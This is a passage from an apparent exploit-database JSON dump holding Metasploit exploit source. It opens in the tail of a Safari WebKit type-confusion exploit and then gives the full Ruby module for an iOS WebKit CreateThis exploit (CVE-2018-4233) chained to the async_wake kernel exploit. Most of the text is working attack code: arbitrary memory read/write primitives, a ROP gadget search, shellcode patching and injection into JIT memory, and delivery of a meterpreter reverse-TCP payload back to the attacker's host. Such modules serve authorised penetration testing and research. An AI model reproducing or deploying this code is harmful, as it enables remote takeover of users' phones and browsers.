SECTION\n ///\n /// Objects are corrupted, a GC would now crash the process.\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\n ///\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\n while (!(driver instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue();\n }\n\n // Get some addresses that we'll need to repair our objects. 
We'll abuse the .mode\n // property of the container to leak addresses.\n driver[2] = containerRawAddr;\n var emptyObjectRawAddr = float64MemView[6];\n container.mode = referenceFloat64Array;\n var referenceFloat64ArrayRawAddr = float64MemView[6];\n\n // Fixup the JSCell header of the container to make it look like an empty object.\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\n driver[2] = emptyObjectRawAddr;\n var header = float64MemView[0];\n driver[2] = containerRawAddr;\n float64MemView[0] = header;\n\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\n driver[2] = referenceFloat64ArrayRawAddr;\n var header = float64MemView[0];\n var length = float64MemView[3];\n var mode = float64MemView[4];\n driver[2] = containerRawAddr;\n float64MemView[2] = header;\n float64MemView[3] = 0;\n float64MemView[5] = length;\n float64MemView[6] = mode;\n\n // Root the container object so it isn't garbage collected.\n // This will allocate a butterfly for the fake object and store a reference to the container there.\n // The fake array itself is rooted by the memory object (closures).\n driver.container = container;\n\n ///\n /// END CRITICAL SECTION\n ///\n /// Objects are repaired, we will now survive a GC\n ///\n if (typeof(gc) !== 'undefined')\n gc();\n\n memory = {\n read: function(addr, length) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n var a = new Array(length);\n for (var i = 0; i < length; i++)\n a[i] = uint8MemView[i];\n return a;\n },\n\n write: function(addr, data) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n for (var i = 0; i < data.length; i++)\n uint8MemView[i] = data[i];\n },\n\n read8: function(addr) {\n driver[2] = 
addr.asDouble();\n return Int64.fromDouble(float64MemView[0]);\n },\n\n write8: function(addr, value) {\n driver[2] = addr.asDouble();\n float64MemView[0] = value.asDouble();\n },\n\n addrof: function(obj) {\n float64MemView.leakme = obj;\n var butterfly = Int64.fromDouble(driver[1]);\n return memory.read8(Sub(butterfly, 0x10));\n },\n };\n\n print(\"[+] Got stable memory read/write!\");\n\n // Find binary base\n var funcAddr = memory.addrof(Math.sin);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n var codeAddr = memory.read8(Add(executableAddr, 24));\n var vtabAddr = memory.read8(codeAddr);\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\n\n var dyldStubLoaderAddr = memory.read8(jscBase);\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\n print(\"[*] dyld.dylib @ \" + dyldBase);\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\n\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\n print(\"[*] confstr @ \" + confstrAddr);\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\n print(\"[*] dlopen @ \" + dlopenAddr);\n\n // Patching shellcode\n var stage2Addr = memory.addrof(stage2);\n stage2Addr = memory.read8(Add(stage2Addr, 16));\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\n\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\n print(\"[+] Shellcode patched\");\n\n // Leak JITCode pointer poison value\n var poison_addr = Add(jscBase, 305152);\n print(\"[*] Poison value @ \" + poison_addr);\n var poison = 
memory.read8(poison_addr);\n print(\"[*] Poison value: \" + poison);\n\n // Shellcode\n var func = makeJITCompiledFunction();\n var funcAddr = memory.addrof(func);\n print(\"[+] Shellcode function object @ \" + funcAddr);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n print(\"[+] Executable instance @ \" + executableAddr);\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\n\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\n var codeAddr = Xor(codeAddrPoisoned, poison);\n print(\"[+] RWX memory @ \" + codeAddr.toString());\n print(\"[+] Writing shellcode...\");\n var origCode = memory.read(codeAddr, stage1.length);\n memory.write(codeAddr, stage1);\n\n print(\"[!] Jumping into shellcode...\");\n var res = func();\n if (res === 0) {\n print(\"[+] Shellcode executed sucessfully!\");\n } else {\n print(\"[-] Shellcode failed to execute: error \" + res);\n }\n\n memory.write(codeAddr, origCode);\n print(\"[*] Restored previous JIT code\");\n\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\n if (typeof(gc) !== 'undefined')\n gc();\n}\n\nready.then(function() {\n try {\n pwn();\n } catch (e) {\n print(\"[-] Exception caught: \" + e);\n }\n}).catch(function(err) {\n print(\"[-] Initializatin failed\");\n});\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\n end\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb"}, {"lastseen": "2020-12-30T05:06:23", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. 
The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The process's credential and sandbox structure in the kernel is overwritten and the meterpreter payload's code signature hash is added to the kernel's trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.\n", "published": "2019-06-02T02:19:24", "type": "metasploit", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13861", "CVE-2018-4233"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type 
confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. 
The process's credential and sandbox structure in the kernel\n is overwritten and the meterpreter payload's code signature hash is added to\n the kernel's trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) 
like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: 
jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 
0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) 
{\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? 
get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = 
true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var 
cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? 
'\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' : '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, 
[sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), 
cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = 